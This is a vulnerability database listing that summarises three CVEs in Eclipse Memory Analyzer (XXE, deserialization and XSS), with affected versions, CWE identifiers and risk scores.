Vulnerabilities > Eclipse > Memory Analyzer

DATE CVE VULNERABILITY TITLE RISK
2023-12-11 CVE-2023-6194 XXE vulnerability in Eclipse Memory Analyzer
In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition.
local
low complexity
eclipse CWE-611
7.1
7.1
2020-01-17 CVE-2019-17635 Deserialization of Untrusted Data vulnerability in Eclipse Memory Analyzer
Eclipse Memory Analyzer version 1.9.1 and earlier is subject to a deserialization vulnerability if an index file of a parsed heap dump is replaced by a malicious version and the heap dump is reopened in Memory Analyzer.
local
low complexity
eclipse CWE-502
7.8
7.8
2020-01-17 CVE-2019-17634 Cross-site Scripting vulnerability in Eclipse Memory Analyzer
Eclipse Memory Analyzer version 1.9.1 and earlier is subject to a cross site scripting (XSS) vulnerability when generating an HTML report from a malicious heap dump.
network
low complexity
eclipse CWE-79
critical
 9.0
9.0